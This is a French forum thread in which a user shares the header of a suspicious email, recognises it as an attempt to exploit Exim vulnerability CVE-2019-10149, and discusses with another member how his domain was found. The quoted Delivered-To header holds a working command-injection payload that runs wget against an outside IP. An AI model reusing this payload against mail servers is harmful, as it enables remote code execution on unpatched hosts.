Tentative de Hack sur MTA Exim4

qo_op · 25 juin 2019

Salut à tous !

Je viens de recevoir un mail trop chelou, sans contenu, et donc les headers ne me rassurent pas tellement. Je partage ça ici : https://www.pastery.net/rxbrea/ (j'ai volontairement remplacé le domaine de mon serveur par "domaine.xx" et mon alias par "alias".

La chose qui m'inquiète : Delivered-To: alias+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@mondomaine.xx

Déjà que "mondomaine.xx" soit trouvable alors que rien ne le référence m'étonne, ensuite "alias" (que j'ai donc volontairement remplacé) est un alias existant aussi et non un alias par défaut donc je suis surpris d'autant plus et le "+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}" n'a rien de rassurant.

Des avis sur tout ça ?

Merci par avance pour vos réponses.

qo_op · 25 juin 2019

Je suis tombé là dessus : https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

Cela semble donc être une vulnérabilité du MTA exim. Je n'ai pas exim sur mon serveur donc surement pas concerné. Faites attention si vous avez exim du coup

qo_op · 25 juin 2019

https://www.exim.org/static/doc/security/CVE-2019-10149.txt

Vulnérabilité corrigé, ils en parlent rapidement ici.

qo_op · 25 juin 2019

Bon après pour mon cas ça ne m'explique quand même pas comment la personne OU le bot a trouvé mon alias et mon domaine. Ça ne me plait pas beaucoup quoi qu'il en soit.

BXT · 27 juin 2019

Plop, intéressant

Si tu as un certif TLS sur ton subdomain, pas bien dur à trouver. Envoie moi ton domaine en mail bxt[at]mondedie[dot]fr que je check

PS: En googlant l'IP de ton payload (65.181.120.163) on s'apercoit que tu n'es pas du tout isolé

qo_op · 28 juin 2019

BXT ok je vois ce que tu veux dire, ils vont pas chercher si loin en fait. J'avoue je n'avais pas pensé aux infos du certif, bien vu. C'est une forte probabilité du coup.
Ca doit être bien rôdé tous ces petits scripts exploitant des failles diverses quand même.